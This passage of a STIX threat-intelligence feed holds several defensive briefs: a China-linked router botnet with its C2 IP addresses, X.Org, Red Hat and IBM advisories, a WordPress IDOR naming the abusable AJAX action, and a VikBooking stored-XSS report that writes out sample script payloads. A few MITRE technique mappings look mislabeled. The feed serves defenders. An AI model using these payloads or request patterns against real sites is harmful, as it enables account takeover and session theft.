breaches, espionage, and disruption. The exact number of victims is not specified, but the continuous development of sophisticated custom malware and active exploitation of N-day vulnerabilities indicate a significant, ongoing threat aimed at enabling broad-scale APT operations.\n\n## Recommendation\n\n*   Immediately patch all Ruckus wireless routers and ASUS AiCloud routers against CVE-2020-22653, CVE-2020-22658, CVE-2023-25717, and CVE-2025-2492 to mitigate initial access vectors.\n*   Block inbound and outbound connections to the observed C2/payload distribution IP addresses 194.233.92[.]26, 217.15.160[.]247, 217.15.164[.]147, and 95.182.100[.]231 at the network perimeter.\n*   Deploy the Sigma rule \"Detect Suspicious Iptables Rule Modifications for DOGLEASH\" to your SIEM to identify `iptables` modifications indicative of DOGLEASH deployment on Linux-based network devices.\n*   Enable comprehensive logging for process creation and command execution on all Linux-based networking devices, specifically focusing on `iptables` commands.\n",
      "published": "2026-07-07T10:03:15Z",
      "labels": [
        "apt",
        "malware",
        "backdoor",
        "orb-network",
        "router-exploitation",
        "china-nexus",
        "linux",
        "embedded"
      ],
      "object_refs": [
        "indicator--14aa045b-6453-56a8-9b63-0ff6e939fa33",
        "indicator--bbc3faf2-a884-5590-87a9-c9755b8af32f",
        "indicator--4b0505c6-386f-5bd6-9051-0cb30eb558db",
        "indicator--0610da4e-becb-51b2-84af-8257bcdb46bb",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
        "attack-pattern--244e0bc7-bed3-5485-8c2d-a9f992f55426",
        "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
        "threat-actor--87222231-1282-5883-8159-e848a7d65fb6"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://blog.talosintelligence.com/uat-7810/"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-22653"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-22658"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25717"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-2492"
        },
        {
          "source_name": "reference",
          "url": "https://thehackernews.com/2026/07/china-linked-uat-7810-expands-orb.html"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9d04cbe9-1617-5e02-a129-dbe91724a162",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--06f8367d-0f72-520d-8278-383f402b7f66",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--62d81a8f-919d-5559-9b9e-26e2186c9a71",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--06f8367d-0f72-520d-8278-383f402b7f66",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--06f8367d-0f72-520d-8278-383f402b7f66",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "X.Org X11 and Xwayland Multiple Vulnerabilities Allowing Code Execution and DoS",
      "description": "## Overview\n\nCERT-Bund has issued an advisory regarding multiple vulnerabilities identified in X.Org X11 and Xwayland, which are widely used display server implementations on Linux systems. These flaws could be exploited by an attacker to induce a Denial of Service (DoS) condition, rendering affected systems unresponsive, or potentially achieve arbitrary code execution. This means an attacker could run their own commands on the compromised system. The advisory, published on July 8, 2026, highlights the significant risk to organizations running Linux distributions that rely on these display servers. While specific attack campaigns or tool names are not detailed, the potential for both system instability and full compromise necessitates immediate attention from defenders.\n\n## Attack Chain\n\n[The source material describes vulnerabilities but does not detail a specific attack chain or observed exploitation steps. Therefore, a detailed attack chain cannot be provided.]\n\n## Impact\n\nThe successful exploitation of these vulnerabilities could lead to severe consequences for affected organizations. A Denial of Service attack would disrupt critical operations by making systems running X.Org X11 or Xwayland unavailable, potentially leading to productivity loss or service interruptions. More critically, the possibility of arbitrary code execution means an attacker could gain control over the compromised system. This could result in data theft, further lateral movement within the network, or the deployment of additional malicious payloads, ultimately leading to system compromise or data exfiltration.\n\n## Recommendation\n\n* Apply available security updates for `X.Org X11` and `Xwayland` immediately to mitigate the underlying vulnerabilities that enable code execution and denial of service.\n* Monitor systems running `X.Org X11` and `Xwayland` for unexpected process creation, unusual network connections, or high resource utilization that could indicate code execution or denial of service attempts.\n",
      "published": "2026-07-08T10:13:54Z",
      "labels": [
        "vulnerability",
        "linux",
        "x.org",
        "x11",
        "xwayland",
        "denial-of-service",
        "code-execution"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2240"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ccb50f20-6e51-52d1-9112-da4ab42350d5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--69a599f7-eb65-5ec7-9ab5-600472d4f396",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f7b78369-cf5f-54aa-aae7-fde3ea77ebf0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--69a599f7-eb65-5ec7-9ab5-600472d4f396",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--69a599f7-eb65-5ec7-9ab5-600472d4f396",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Red Hat Enterprise Linux (389-ds-base): Multiple Vulnerabilities Allow Code Execution and DoS",
      "description": "## Overview\n\nThe BSI (Cert-Bund) has issued an advisory detailing multiple vulnerabilities within Red Hat Enterprise Linux, specifically impacting the `389-ds-base` component. Published on July 8, 2026, the advisory highlights that a remote, authenticated attacker can exploit these weaknesses to achieve arbitrary code execution or induce a denial-of-service condition on affected systems. This poses a significant risk to the integrity and availability of services relying on vulnerable RHEL installations, as an attacker gaining code execution could compromise the system further, leading to data exfiltration, further lateral movement, or complete system takeover. The advisory does not specify particular CVEs or observed exploitation in the wild, but emphasizes the severe potential impact of these flaws. Defenders should prioritize patching as these types of vulnerabilities are frequently targeted.\n\n## Impact\n\nSuccessful exploitation of these vulnerabilities could lead to severe consequences. Arbitrary code execution grants an authenticated attacker full control over the compromised Red Hat Enterprise Linux system, potentially allowing for data theft, modification of system configurations, or deployment of additional malicious payloads. Alternatively, triggering a denial-of-service condition would render affected systems unresponsive or unavailable, disrupting critical business operations and services. While the advisory does not provide victim numbers or specific sectors targeted, any organization running vulnerable versions of Red Hat Enterprise Linux with the 389-ds-base component could be at risk. The potential for both system compromise and service disruption underscores the high severity.\n\n## Recommendation\n\n* Apply available security updates to all affected Red Hat Enterprise Linux systems, specifically those running the `389-ds-base` component, as detailed in the `affected_products` and `affected_os` fields of this brief.\n",
      "published": "2026-07-08T10:28:10Z",
      "labels": [
        "linux",
        "vulnerability",
        "code-execution",
        "denial-of-service",
        "red-hat"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2225"
        }
      ],
      "confidence": 80
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--62885ec9-ff48-5ea4-93c9-e20fb642a5f4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Adobe Security Updates — July 2026",
      "description": "## Overview\n\nAggregated Adobe security advisories for July 2026. CVEs from this cycle are folded\ninto the list below as they are published.\n\n## Recommendation\n\nReview affected products and apply Adobe's July 2026 security updates.\n",
      "published": "2026-07-08T10:47:04Z",
      "labels": [
        "roundup"
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--86efcd35-a4b2-5e3b-ab6a-9172c80e9836",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b0c35b74-5420-5c19-92b1-d90511cad478",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--64171482-0684-54f1-8b55-bd076141eab0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b0c35b74-5420-5c19-92b1-d90511cad478",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a22493f4-a6a9-597f-b1fe-78e2c4e61694",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation of Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1210",
          "url": "https://attack.mitre.org/techniques/T1210"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c7e4ce8a-bb62-58bf-941b-b3e9c41a08bc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b0c35b74-5420-5c19-92b1-d90511cad478",
      "target_ref": "attack-pattern--a22493f4-a6a9-597f-b1fe-78e2c4e61694"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fe842af0-2fb0-56b5-a291-4e94dc92c5f4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b0c35b74-5420-5c19-92b1-d90511cad478",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b0c35b74-5420-5c19-92b1-d90511cad478",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Multiple Vulnerabilities in IBM Operational Decision Manager",
      "description": "## Overview\n\nCERT-Bund has issued an advisory detailing multiple undisclosed vulnerabilities affecting IBM Operational Decision Manager (ODM). These vulnerabilities can be exploited by a remote and anonymous attacker without requiring any authentication. The successful exploitation of these flaws allows an adversary to bypass critical security restrictions within the application, leading to severe consequences such as arbitrary remote code execution (RCE) on the underlying host system, and the ability to trigger a denial of service (DoS) condition, rendering the service unavailable. While specific versions and detailed technical exploitation methods were not released, the severity of the potential impact emphasizes the critical need for immediate patching and defensive measures for any organizations operating exposed IBM ODM instances. The advisory was published on July 8, 2026.\n\n## Attack Chain\n\n1. A remote, unauthenticated attacker identifies an exposed IBM Operational Decision Manager (ODM) instance that is accessible via the network.\n2. The attacker crafts and sends specifically engineered malicious requests to the vulnerable ODM instance, targeting one or more of the undisclosed security flaws.\n3. Successful exploitation of the vulnerability enables the attacker to bypass the application's inherent security restrictions and access controls.\n4. The attacker leverages the bypassed security measures to execute arbitrary code on the server hosting the IBM ODM application, often with the privileges of the application process.\n5. Alternatively, by exploiting a different vulnerability, the attacker triggers a denial of service condition, disrupting the availability and normal operation of the IBM ODM instance.\n6. Through remote code execution, the attacker can establish persistence, exfiltrate sensitive business logic or data, or utilize the compromised ODM server as a pivot point for further lateral movement within the victim's internal network.\n\n## Impact\n\nThe observed impact includes the capability for a remote, unauthenticated attacker to bypass security restrictions, execute arbitrary code, and induce a denial of service. Remote code execution on an IBM Operational Decision Manager instance could lead to unauthorized access to sensitive business rules, critical decision-making logic, and potentially confidential data processed by the application. A denial of service attack would severely disrupt business operations reliant on ODM, causing significant financial losses and operational downtime. The anonymous nature of the attack makes attribution difficult, increasing the risk for targeted sectors that rely on robust decision management systems.\n\n## Recommendation\n\n* Apply the latest security updates provided by IBM for Operational Decision Manager to address the multiple vulnerabilities.\n* Implement robust network segmentation to restrict direct untrusted internet access to IBM Operational Decision Manager instances, placing them behind appropriate security controls.\n* Monitor the IBM Operational Decision Manager application and its underlying host for anomalous process creation, suspicious network connections, or unusual resource consumption that could indicate a denial of service attempt.\n* Deploy an Intrusion Prevention System (IPS) or Web Application Firewall (WAF) in front of IBM ODM instances to help detect and block malicious request patterns targeting these types of vulnerabilities.\n",
      "published": "2026-07-08T11:53:00Z",
      "labels": [
        "vulnerability",
        "rce",
        "dos",
        "ibm",
        "security-bypass"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--a22493f4-a6a9-597f-b1fe-78e2c4e61694",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2242"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a7eb39a5-dc4d-5584-a06f-868020128017",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d420d2a3-6750-5ead-af43-4b618471dda9",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c0ce13d0-4288-5b23-9a28-40a3beda90a7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d420d2a3-6750-5ead-af43-4b618471dda9",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d420d2a3-6750-5ead-af43-4b618471dda9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-3688: WordPress WCFM Membership Plugin Insecure Direct Object Reference",
      "description": "## Overview\n\nA critical Insecure Direct Object Reference (IDOR) vulnerability, tracked as CVE-2026-3688, has been identified in the WCFM Membership - WooCommerce Memberships for Multivendor Marketplace plugin for WordPress, affecting all versions up to and including 2.11.10. This flaw stems from insufficient validation of user permissions within the 'wcfmvm_membership_change' AJAX action, failing to confirm if an authenticated user is authorized to modify other users' roles or membership plans. Exploitation allows an authenticated attacker, holding at least vendor-level privileges, to arbitrarily alter any user's role within the marketplace to 'wcfm_vendor'. This can lead to unauthorized account takeover, disruption of marketplace operations, and potential financial impact by granting malicious actors control over other vendor accounts.\n\n## Attack Chain\n\n1. An attacker obtains valid authentication credentials for a WordPress account with at least vendor-level access on a site running the vulnerable WCFM Membership plugin.\n2. The attacker logs into the WordPress site, establishing an authenticated session.\n3. The attacker crafts a malicious HTTP POST request targeting the `/wp-admin/admin-ajax.php` endpoint.\n4. The crafted request includes the `action=wcfmvm_membership_change` parameter along with specific data identifying a target user and a desired membership plan corresponding to the 'wcfm_vendor' role.\n5. Due to the Insecure Direct Object Reference vulnerability (CVE-2026-3688), the plugin fails to properly validate whether the authenticated attacker has permission to modify the specified target user's membership.\n6. The plugin processes the illicit request, updating the target user's membership plan.\n7. The target user's role within the WCFM marketplace is consequently changed to 'wcfm_vendor'.\n8. The attacker achieves unauthorized privilege escalation, gaining control over another user's vendor account.\n\n## Impact\n\nThis vulnerability carries a CVSS v3.1 Base Score of 8.1 (High), indicating significant impact. Successful exploitation by an authenticated attacker, even with basic vendor access, allows them to arbitrarily change the role of any other user to 'wcfm_vendor'. This directly translates to unauthorized privilege escalation, potentially granting attackers control over other legitimate vendor accounts within the marketplace. Such control can lead to disruption of normal marketplace operations, fraudulent transactions, data manipulation, reputation damage, and financial losses for the affected organization and its users.\n\n## Recommendation\n\n* Immediately update the \"WCFM Membership - WooCommerce Memberships for Multivendor Marketplace\" plugin to a patched version greater than 2.11.10 to remediate CVE-2026-3688.\n* Review web server access logs for any suspicious POST requests to `/wp-admin/admin-ajax.php` with `action=wcfmvm_membership_change` that originate from unexpected IP addresses or accounts during the period the vulnerable plugin was active.\n* Examine WordPress user roles for any unauthorized changes to 'wcfm_vendor' during the period the vulnerable plugin was active.\n",
      "published": "2026-07-08T12:18:39Z",
      "labels": [
        "wordpress",
        "web",
        "vulnerability",
        "idor",
        "privilege-escalation"
      ],
      "object_refs": [
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3688"
        },
        {
          "source_name": "reference",
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8a934ccd-9330-4585-9994-838940d24980?source=cve"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--31804942-b175-57e7-beda-6f7e4a67a343",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--06b484a9-b3dd-5083-9084-b5f13ce69f65",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6473ef26-15c6-55f0-a2fe-24d92fe5aebf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--06b484a9-b3dd-5083-9084-b5f13ce69f65",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Use Alternate Authentication Material",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1550",
          "url": "https://attack.mitre.org/techniques/T1550"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--936c4781-ffd5-514d-acfc-73748b4580fa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--06b484a9-b3dd-5083-9084-b5f13ce69f65",
      "target_ref": "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--866311ba-d235-5965-b398-3f6a5135ee52",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Defacement",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1498",
          "url": "https://attack.mitre.org/techniques/T1498"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3e1d0848-0636-5e79-82a0-0a24bc26764b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--06b484a9-b3dd-5083-9084-b5f13ce69f65",
      "target_ref": "attack-pattern--866311ba-d235-5965-b398-3f6a5135ee52"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f1fcaa67-e3a5-5b21-a512-0b268d6e72d2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--06b484a9-b3dd-5083-9084-b5f13ce69f65",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--06b484a9-b3dd-5083-9084-b5f13ce69f65",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-6818: VikBooking WordPress Plugin Stored XSS Vulnerability",
      "description": "## Overview\n\nCVE-2026-6818 details a critical stored cross-site scripting (XSS) vulnerability impacting the VikBooking Hotel Booking Engine \u0026 PMS plugin for WordPress, specifically affecting all versions up to and including 1.8.8. This flaw stems from inadequate input sanitization and output escaping of the 'special_requests' parameter, allowing unauthenticated attackers to embed malicious JavaScript code. When a user, such as an administrator or another customer, views a page containing the specially crafted 'special_requests' data, the injected script executes within their browser context. The consequences of such an attack can include session hijacking, unauthorized data exfiltration, malicious redirection, or website defacement. This vulnerability highlights the importance of rigorous input validation and output encoding in web applications, especially in popular content management systems like WordPress.\n\n## Attack Chain\n\n1. An unauthenticated attacker identifies a WordPress site running the vulnerable VikBooking Hotel Booking Engine \u0026 PMS plugin (versions \u003c= 1.8.8).\n2. The attacker accesses a customer-facing booking form or a similar endpoint where the 'special_requests' parameter is accepted.\n3. The attacker crafts a malicious cross-site scripting (XSS) payload (e.g., `\u003cscript\u003ealert('XSS');\u003c/script\u003e` or `\u003cimg src=x onerror=alert(document.domain)\u003e`) and submits it within the 'special_requests' field during a booking or request submission.\n4. The VikBooking plugin, due to insufficient input sanitization, stores this malicious payload directly into the WordPress database.\n5. A legitimate user (e.g., a site administrator or another customer) navigates to a page within the WordPress dashboard or the public site where the stored 'special_requests' content is displayed (e.g., booking details, order management).\n6. The web server retrieves the stored malicious payload from the database and renders it in the legitimate user's browser without proper output escaping.\n7. The injected JavaScript executes in the context of the user's browser session, allowing the attacker to steal session cookies, deface the page, redirect the user, or perform other malicious actions, achieving unauthorized data access or session hijacking.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-6818 allows unauthenticated attackers to inject persistent malicious scripts into vulnerable WordPress sites. When executed in a legitimate user's browser, these scripts can lead to various severe consequences, including session hijacking, enabling the attacker to impersonate the user and access sensitive information. Attackers could also redirect users to phishing sites, perform unauthorized actions on behalf of the victim, or deface the website's content, damaging the organization's reputation and trust. The wide adoption of WordPress plugins means a significant number of websites could be at risk if not promptly patched.\n\n## Recommendation\n\n* Immediately update the VikBooking Hotel Booking Engine \u0026 PMS plugin to version 1.8.9 or higher to remediate CVE-2026-6818.\n* Deploy the provided Sigma rule to your SIEM to detect attempts to inject XSS payloads into web requests.\n* Enable comprehensive webserver logging (e.g., Apache access logs, Nginx access logs, IIS logs) to capture full HTTP request bodies and query parameters.\n* Regularly review web application logs for unusual HTTP requests, especially those containing common XSS vectors or suspicious characters within user-supplied input fields.\n",
      "published": "2026-07-08T12:20:17Z",
      "labels": [
        "wordpress",
        "plugin",
        "xss",
        "web-vulnerability",
        "cms"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92",
        "attack-pattern--866311ba-d235-5965-b398-3f6a5135ee52",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6818"
        },
        {
          "source_name": "reference",
          "url": "https://plugins.trac.wordpress.org/browser/vikbooking/tags/1.8.9/admin/helpers/widgets/booking_details.php#L684"
        },
        {
          "source_name": "reference",
          "url": "https://plugins.trac.wordpress.org/browser/vikbooking/tags/1.8.9/admin/views/editorder/tmpl/default.php#L2717"
        },
        {
          "source_name": "reference",
          "url": "https://plugins.trac.wordpress.org/browser/vikbooking/tags/1.8.9/admin/views/orders/tmpl/default.php#L769"
        },
        {
          "source_name": "reference",
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/13a96e78-c83c-4ff1-a751-3dbaeb683d9d?source=cve"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
